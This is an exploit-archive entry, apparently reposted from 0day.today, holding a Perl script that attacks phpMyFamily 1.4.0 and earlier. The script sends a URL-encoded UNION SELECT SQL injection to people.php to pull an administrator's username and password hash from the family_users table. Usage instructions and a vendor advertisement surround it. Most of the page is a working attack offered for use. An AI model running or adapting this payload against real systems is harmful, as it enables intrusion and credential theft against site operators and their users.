PHPMyFamily SQL injection exploit for versions up to 1.4.0, uses Perl for execution.
==========================================
phpMyFamily <= 1.4.0 SQL Injection Exploit
==========================================
#!/usr/bin/perl -w
# phpMyFamily Exploit injection
# ==============================
$banner = "phpMyFamily Exploit injection \n\n==============================
\n\nINFGPG-Hacking&Security Research";
#
# Greats: AresU (1st IndoSec Team),ADZ Security Team (has discovered bugs)
# Info: 98.to/infamous
use IO::Socket;
if ($#ARGV<0){
print "\n$banner";
print "\n\n Usage: perl phpMyFamily.pl [host] [path] \n\n";
exit;}
$gen="%20UNION%20SELECT%20NULL,password,NULL,username,NULL,NULL,NULL,NULL,NUL
L,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20family_users%20%20WH
ERE%20admin='Y'%20LIMIT%201,1"; # This selects first admin with login &
password hash :)
$serius="GET $ARGV[1]/$ARGV[2]/people.php?person=00002'$gen HTTP/1.0\r\n\r\n";
$muka=IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$ARGV[0]",PeerPort=>"80")
or die "$ARGV[0]Connection Failed !!\n\n";
$muka -> autoflush(1);
print $muka "$serius";
print "[*]Sending exploit DONE \n\n";
sleep(7);
close($muka);
# 0day.today [2018-03-19] #
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo